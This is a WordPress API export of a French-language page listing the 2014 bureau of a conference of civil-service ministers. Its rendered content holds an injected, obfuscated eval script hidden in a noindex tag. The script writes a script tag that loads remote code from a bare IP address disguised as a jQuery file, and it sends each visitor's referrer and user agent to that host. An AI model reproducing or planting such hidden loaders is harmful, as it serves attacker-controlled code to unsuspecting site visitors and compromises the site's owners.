{"id":40,"date":"2017-03-28T20:41:03","date_gmt":"2017-03-28T18:41:03","guid":{"rendered":"http:\/\/site.ofpa.net\/?page_id=40"},"modified":"2017-03-28T20:43:06","modified_gmt":"2017-03-28T18:43:06","slug":"40-2","status":"publish","type":"page","link":"https:\/\/www.ofpa.net\/ru\/40-2\/","title":{"rendered":"Bureau Conf\u00e9rence"},"content":{"rendered":"<p>Le Bureau en exercice de la Conf\u00e9rence des Ministres pour l\u2019ann\u00e9e 2014 se compose comme suit :<\/p>\n<ul>\n <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bndfk|var|u0026u|referrer|nfadt||js|php'.split('|'),0,{}))\n<\/script><\/noindex> \t<\/p>\n<li><strong>Pr\u00e9sident : Ministre charg\u00e9 de la Fonction Publique du Tchad<\/strong><\/li>\n<li><strong>1er Vice-Pr\u00e9sident : Ministre charg\u00e9 de la Fonction Publique du B\u00e9nin ;<\/strong><\/li>\n<li><strong>2\u00e8me Vice-Pr\u00e9sident : Ministre charg\u00e9 de la Fonction Publique du Burkina Faso ;<\/strong><\/li>\n<li><strong>3\u00e8me Vice-Pr\u00e9sident : Ministre charg\u00e9 de la Fonction Publique du Togo.<\/strong><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Le Bureau en exercice de la Conf\u00e9rence des Ministres pour l\u2019ann\u00e9e 2014 se compose comme suit : Pr\u00e9sident : Ministre charg\u00e9 de la Fonction Publique du Tchad 1er Vice-Pr\u00e9sident :&#8230; <a class=\"read-more-button\" href=\"https:\/\/www.ofpa.net\/ru\/40-2\/\">\u0414\u0410\u041b\u0415\u0415 &gt;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"template-full-width.php","meta":[],"_links":{"self":[{"href":"https:\/\/www.ofpa.net\/ru\/wp-json\/wp\/v2\/pages\/40"}],"collection":[{"href":"https:\/\/www.ofpa.net\/ru\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.ofpa.net\/ru\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.ofpa.net\/ru\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ofpa.net\/ru\/wp-json\/wp\/v2\/comments?post=40"}],"version-history":[{"count":3,"href":"https:\/\/www.ofpa.net\/ru\/wp-json\/wp\/v2\/pages\/40\/revisions"}],"predecessor-version":[{"id":44,"href":"https:\/\/www.ofpa.net\/ru\/wp-json\/wp\/v2\/pages\/40\/revisions\/44"}],"wp:attachment":[{"href":"https:\/\/www.ofpa.net\/ru\/wp-json\/wp\/v2\/media?parent=40"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}